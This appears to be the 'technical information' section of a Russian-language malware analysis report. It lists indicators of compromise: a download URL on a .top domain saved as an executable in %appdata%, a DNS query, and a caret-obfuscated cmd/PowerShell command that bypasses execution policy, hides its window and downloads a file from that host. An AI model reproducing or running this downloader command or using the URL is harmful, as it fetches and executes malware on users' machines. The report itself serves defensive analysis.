Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POweRsH^el^L.^e^Xe^ ^-e^xEcU^tIon^pOL^ICy ByPAsS -N^opRofiL^E ^-WiNdO^WSt^Y^Le^ Hid^d^E^n (neW-oBJECt S^YS^Tem.^N^e^T.wEb^c^LIent).^d^OWNl^OA^d^file(^'http://www.fopeio...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "POweRsH^el^L.^e^Xe^ ^-e^xEcU^tIon^pOL^ICy ByPAsS -N^opRofiL^E ^-WiNdO^WSt^Y^Le^ Hid^d^E^n (neW-oBJECt S^YS^Tem.^N^e^T.wEb^c^LIent).^d^OWNl^OA^d^file(^'http://www.fopeio...' (со скрытым окном)